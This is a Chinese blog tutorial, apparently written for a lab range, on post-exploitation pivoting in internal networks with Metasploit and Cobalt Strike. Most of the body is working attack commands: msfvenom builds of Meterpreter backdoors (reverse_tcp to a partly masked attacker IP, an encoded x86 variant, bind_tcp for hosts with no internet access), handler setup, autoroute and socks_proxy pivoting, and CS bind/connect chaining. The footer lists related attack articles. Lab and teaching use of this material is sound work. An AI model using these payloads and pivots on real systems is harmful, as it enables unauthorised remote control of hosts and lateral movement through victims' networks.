【内网安全】代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线

最新推荐文章于 2024-03-11 21:43:05 发布
最新推荐文章于 2024-03-11 21:43:05 发布
阅读量1.1k 收藏 4
点赞数
文章标签: 安全 网络 windows web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/129549829
版权

代理Socks协议&路由不出网&后渗透通讯&CS-MSF控制上线

靶场搭建

文章内容展示cs完整上线过程,msf思路等同
在这里插入图片描述

要点

#网络通讯-MSF&CS-路由添加&节点建立
#控制上线-MSF&CS-协议生成&正反连接
代理协议:
SOCKS4/5
代理软件:
SocksCap Proxifier ProxyChains等
靶场环境搭建描述:

  • 只有Win7出网,其他均为内网环境
  • 内网渗透过程中忽略利用什么漏洞方式拿到的权限
  • 两个部分:1.如何进行通讯 2.如何拿到权限

MSF通讯

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.xx.xx LPORT=7777 -f exe > msf_7777.exe

忽略细节,将msf_7777放置windows 7上,直接上线
注意:实验之前查看靶机操作系统是否是64位,否则使用msf生成x84架构的木马

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=47.94.xx.xx LPORT=7777 -b"\x00" -e x86/shikata_ga_nai -f exe > msfx86_7777.exe

建议使用64位,以免出现其他错误,当然64位操作系统兼容32位程序
在这里插入图片描述

添加路由 限于MSF

ipconfig查看是否有内网
在这里插入图片描述

查看路由信息

run autoroute -p

自动添加路由

run post/multi/manage/autoroute

在这里插入图片描述
或者手动添加指定路由,1是接收的session编号

route add 192.168.1![在这里插入图片描述](https://img-blog.csdnimg.cn/50eb5ffb00ca41efb8f7eea5e80bdce9.png)
0.0 255.255.255.0 1

bg 退出该会话 route print 查看已有路由信息
在这里插入图片描述

Sock代理 全局同用

到目前,只有msf可以通讯靶机内网,因为建立了路由,那么内网中其他靶机资产如何使用windows下渗透测试工具进行测试呢? 使用代理工具
先将msf代理流量转发至本地1234端口,然后使用代理工具连接该端口,进行流量转发

use auxiliary/server/socks_proxy
set srvhost 0.0.0.0
set srvport 1234
run

在这里插入图片描述
启用代理软件配置Sock5代理

msf 内网流量转发代理

CS通讯

命令:socks port
操作:代理转发-Socks代理

cs 内网流量转发代理

内网第二层主机 不出网

这里忽略从windows 7 通过scan获得其他内网主机ip,以及通过win 10开放的服务进行渗透(横向移动),默认通过其他操作将正向连接后门上传到win 10上。视频演示为如何正常上线msf&cs

MSF控制上线-正向连接

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=3333 -f exe > msf_127bd_3333.exe

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.10.xx
set lport 3333
run

CS控制上线-正向连接

监听器:bind_tcp port
命令:connect ip port

cs二层内网主机正向连接上线

实验2:三层(后续多层操作一致)

MSF控制上线-正向连接

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4455 -f exe > bd2.exe

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 192.168.10.xx
set lport 4455
run

CS控制上线-正向连接

监听器:bind_tcp port
命令:connect ip port
效果图:
在这里插入图片描述
在这里插入图片描述

其它补充:

  1. ip地址每次重启会发生更改-DHCP协议
  2. 搭建环境VM虚拟网卡设置问题、增加网卡搭建环境-模拟不同局域网
  3. 下次更新linux环境下代理工具使用-ProxyChains
  4. 真实环境加入防火墙&WAf&杀毒软件 限制出入站连接等-隧道技术
  5. ……
今天是 几号
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSH端口转发实现内网穿透的实现
01-10
我们局域的机器能够访问外,但是外不能访问内网。因为内网访问互联时候能确定外的地址,外却不能确定我们局域内的具体地址。(ip地址有限)如果 我们在访问外的时候,这个链接让他保持、不断,那么这个链接就相当于我们建了一条路,内网数据能出去,外数据能进来,ssh也是这个方法。 使用ssh命令链接公服务器 1、首先在外服务器上编辑sshd的配置文件 vim /etc/ssh/sshd_config #将GatewayPorts 开关打开 GatewayPorts yes 重启sshd服务,使用修改生效(linux 版本不同命令可能会有差异) systemctl restart
端口映射通用代理工具Port
08-14
通用端口映射通用代理工具PortTunnel目前最好的端口转发器、端口映射工具(外部计算机可以访问局部内的计算机HTTPFTP),TCPIP 端口重定向记录。通过在服务器安装运行此程序, 可以使因特上的计算机访问局部内的计算机建立的HTTP、FTP与SMTP服务,包含IP 安全(与Win2KWinXP 上秘密端口)。
内网正向连接与反向连接
最新发布
尘玥的故事
03-11 548
反向连接控制主机监听一个端口,由受害主机反向去连接控制主机的过程,适用于受害主机出(或出且没有公ip)的情况。例如,受害主机是一台位于内网,并且没有公ip且能访问互联的主机,控制主机无法直接通过ip地址访问到受害主机。例如下面,受害主机具有公ip,被控主机kali可以通过ip地址访问到受害主机,所以能够使用正相连接控制受害主机。正向连接是受害主机监听一个端口,由控制主机主动去连接受害主机的过程,适用于受害主机具有。由于正向连接是被攻击者主动连接攻击者,所以不受防火墙策略的限制。
sockt代理转发的代码
03-13
一个C程序写的端口代理程序,有参数输入,有守护进程。有两端SOCKET代理,可自由在线程里修改替换代码。用于给APP做前端代理的BOX
pcap2socks:使用pcap将流量重定向到SOCKS代理
03-20
pcap2socks pcap2socks是一个代理,它使用Rust中编写的pcap将流量重定向到SOCKS代理。 您可以将用作前端界面。 pcap2socks旨在加速游戏机中的游戏。 特征 重定向流量:将TCP和UDP流量重定向到SOCKS代理代理ARP :回复ARP请求,因为它拥有不在网络上的指定地址。 跨平台 全锥NAT 依存关系 Windows中的或WinPcap(如果使用Npcap,请确保使用“在WinPcap API兼容模式下安装Npcap”进行安装),macOS,Linux等中的libpcap。 建造 视窗 如果你想在Windows建pcap2socks,你必须满足所描述的所有三个要求 。 用法 pcap2socks -s <ADDRESS> # Or a more general one using proxy ARP (recommended) pcap2sock
aaa.zip_https代理_socks
09-24
IE快速代理设置,方便切换,有http,https,ftp,socks一键完成!!
使用Msfvenom生成Ubuntu 64位木马(反向连接正向连接
zhang35的博客
04-20 9904
环境 攻击机:Kali Linux 2020.1 172.16.252.129 靶机:Ubuntu 16.04 172.16.252.138 生成木马 使用kali自带的Msfvenom工具生成木马。 查看有哪些linux下的载荷: msfvenom -l payloads | grep linux 针对Ubuntu 64位靶机,使用linux/x64/meterpreter/reverse_t...
ms17-010漏洞复现(正向连接+反向连接
qq_53733257的博客
07-15 751
攻击机和目标机一定要能互相通信,否则就要调试设置网络适配器以及查看目标机防火墙是否关闭,直到能够互相通信为止。,完成后不要关闭终端,让他一直挂在后台。set rhosts 192.168.21.19 #设置模块3的参数,将rhosts设置成目标机ip。set rhosts 192.168.21.19 #设置模块0的参数,将rhosts设置成目标机ip。4、使用编号为3的模块,对目标机进行扫描,确认该目标机是否存在ms17-010漏洞。5、利用模块0,对目标机进行攻击,模块0的利用方式步骤和模块3相同。
一条命令上线MSF(Metasploit)-web_delivery模块
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
10-31 2364
一条命令上线MSF(Metasploit)-web_delivery模块
[ MSF使用实例 ] 利用永恒之黑采用正向连接 shell 获得主机权限(CVE-2020-0796)(SMBGhost)
qq_51577576的博客
10-19 1023
[ MSF使用实例 ] 利用利用SMBv3远程代码执行漏洞(SMBGhost)(CVE-2020-0796)(永恒之黑)采用正向连接 shell 获得主机权限 SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。 SMBGhost
上线MSF(Metasploit)的几种常见方式
qq_46258964的博客
04-14 8869
powershell上线 利用powershell上线msf 对应模块use exploit/multi/script/web_delivery use exploit/multi/script/web_delivery set target 2 set payload windows/x64/meterpreter/reverse_tcp set lhost 172.16.1.10 set lport 6666 run 复制对应的powershell代码到Windows主机中执行便可以上线msf m
socks5代理配置及发送邮件.rar
12-31
文档详细描述,linux不通外的情况下,通过在另一台通外的服务器搭建socks5代理服务,不通外的服务器通过socks5代理,成功向外发送邮件的功能。
第70天:内网安全-域横向内网漫游Socks代理隧道技术1
08-03
1.内外简单知识 2.内网 1 和内网 2 通信问题 3.正向反向协议通信连接问题 4.内网穿透代理隧道技术说明 2.测试:内网 1 执行后门-免费主机处理-
内网渗透之端口转发-内网代理1
08-03
正向代理 (Forward Proxy) ②反向代理(reverse proxy) ③区分 ①内网机器上执行:lcx.exe –slave 公 IP + 端
使用EW作Socks5代理进行内网渗透1
08-03
1. 如何使用EW做反向Socks5代理 2. 浏览器如何设置Socks5代理访问目标内网Web服务 3. 利用proxychains给终端设置Socks5代理
论文研究-基于PetriSocks协议建模与分析.pdf
07-22
论述基于PetriSocks协议分析,通过对Socks协议的分解,给出了Socks协议各阶段的流程,并建立相应的Petri模型,从而完成对Socks协议运行机制和实现原理的分析。
自建私有云服务+内网转外端口映射数据转发+代理服务tfcenter-windows-1.43
05-13
(13) 支持socks5代理功能 更新日志: v1.4.2 (1) 禁止Webdav用户可以登陆管理页面 v1.4.1 (1) 修复windows使用socks代理失败问题 v1.4.0 (1) 新增socks5代理服务功能 (2) 优化PC页面配置显示 (3) 修复本地文件...
内网安全代理技术详解
m0_59598029的博客
03-07 962
背景:拿下内网的一个主机权限并且上线MSF/CS上,IP:192.168.x.*使用控制192.168.x.*的Meterpreter启动路由MSF相当于进入到该段中开启节点,支持代理来的转发流量攻击机A(外,军火库)配置代理MSFCS代理建立:有手就行在192.168.x.*的会话上开启SOCKS代理在攻击机A上配置代理装置建立通讯的最大意义就是:可以实现攻击机与内网主机的通讯,有了通讯才能横向移动要根据防火墙因地制宜的选择方式。
MSF 详解
m0_72125469的博客
05-19 4270
The Metasploit Framework 的简称。MSF 高度模块化,即框架由多个 module 组成,是全球最受欢迎的渗透测试工具之一。是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode ,并持续保持更新。metasploit 涵盖了渗透测试中全过程,你可以在这个框架下利用现有的 Payload进行一系列的渗透测试。msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。
frp socks5代理 内网渗透
10-18
frp是一款高性能的反向代理工具,可以将内网服务映射到公上,从而实现内网穿透。而socks5代理是一种网络协议,可以实现TCP、UDP等协议代理转发。结合使用frp和socks5代理,可以实现内网渗透的目的。 具体实现方法如下: 1. 在公服务器上安装frp,并配置好反向代理规则。 2.*** 在攻击机上使用socks5代理客户端连接内网机器的socks5代理服务,即可访问内网服务。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值